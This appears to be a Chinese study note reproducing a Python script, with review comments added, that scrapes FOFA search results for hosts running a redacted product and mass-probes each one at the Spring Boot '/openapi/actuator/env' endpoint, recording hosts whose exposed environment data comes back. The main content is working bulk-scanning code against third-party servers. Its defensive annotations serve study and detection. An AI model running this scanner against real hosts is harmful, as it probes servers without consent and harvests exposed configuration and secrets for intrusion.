结合 FOFA 爬取 IP 段，再进行批量的 PoC 验证
本文为学习笔记,侵删
详细解释参考文章:
https://wenku.baidu.com/view/4c8c5fa2ef3a87c24028915f804d2b160b4e86f8.html
代码:
代码来源:https://chiza.gitee.io/2022/02/28/%E8%AE%B0%E4%B8%80%E6%AC%A1edusrc%E7%9A%84%E6%8C%96%E6%8E%98/
这里对一些地方进行注释方便理解
import requests
import base64
from lxml import etree
import time
# The `//` lines below are the page author's own annotations and are kept
# verbatim; the `#` lines are added review notes.
//fofa搜索的内容
# FOFA query string; the product name is redacted on the page as "****系统".
search_data='"****系统"'
//fofa 的key
# Request headers carrying a FOFA session cookie. A literal credential kept
# in source is easy to leak through pastes or commits; 'fofa.cookie' is a
# placeholder value on this page.
headers={
'cookie':'fofa.cookie',
}
//1.爬取fofa的ip保存到ip.txt
# Step 1: result pages 1 and 2 (range(1,3)) are fetched from FOFA and the
# href of every <a target="_blank"> element is appended to ip.txt.
for Page_number in range(1,3):
# The query is base64-encoded into the qbase64 parameter of the result URL.
url='https://fofa.info/result?page='+str(Page_number)+'&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")), "utf-8")
urls=url+search_data_bs
#print(urls)
try:
print('正在爬取第' + str(Page_number) + '页')
result=requests.get(urls,headers=headers).content.decode('utf-8')
#print(result)
soup = etree.HTML(result)
ip_data=soup.xpath('//a[@target="_blank"]/@href')
# One href per line; the write below adds one more newline per page.
ipdata='\n'.join(ip_data)
print(ip_data)
with open(r'ip.txt', 'a+') as f:
f.write(ipdata+'\n')
# Redundant: the with-block already closes the file on exit.
f.close()
time.sleep(0.5)
except Exception as e:
# Any failure (network error, parse error, changed page layout) is
# silently discarded, so an empty ip.txt carries no indication of why.
pass
//2.下面是poc的编写
# Step 2: every line of ip.txt is requested with the path below. The path
# matches the Spring Boot Actuator `env` endpoint; a 200 response whose body
# contains 'activeProfiles' is treated as an exposed, unauthenticated env
# endpoint (application environment and configuration readable). Defensive
# side: keep actuator endpoints off the web exposure list or behind
# authentication, and alert on GET requests to */actuator/env arriving from
# one source across many hosts.
payload='/openapi/actuator/env'
//打开遍历的ip.txt
for ip in open('ip.txt'):
//防止\n(换行符)也一起读出来
# Strip the newline read from the file.
ip=ip.replace('\n','')
# The hrefs scraped from FOFA are used verbatim as the base URL.
new_url=ip+payload
#print(new_url)
try:
//向网站发起请求,并获取响应对象
# Two separate GET requests are sent per host: one for the body, one for the
# status code. Each probed server therefore sees a pair of identical
# requests, and the two responses are not guaranteed to come from the same
# exchange.
result=requests.get(new_url).content.decode('utf-8')
//响应码
code=requests.get(new_url).status_code
print("check_ip->"+ip)
//这个'ac*'应该是成功的特征
# Match condition: 'activeProfiles' in the body and HTTP 200.
if 'activeProfiles' in result and code==200:
print(('\033[31m存在漏洞的URL->'),new_url)
print('\033[0m')
//打开result.txt文件写入存在漏洞的地址
# Hits are appended to result.txt (host only, without the payload path).
with open(r'result.txt','a+') as f:
f.write(ip+'\n')
# Redundant: the with-block already closes the file on exit.
f.close()
time.sleep(0.5)
except Exception as e:
# Connection failures and decode errors are all swallowed, so unreachable
# hosts are indistinguishable from clean ones in the output.
pass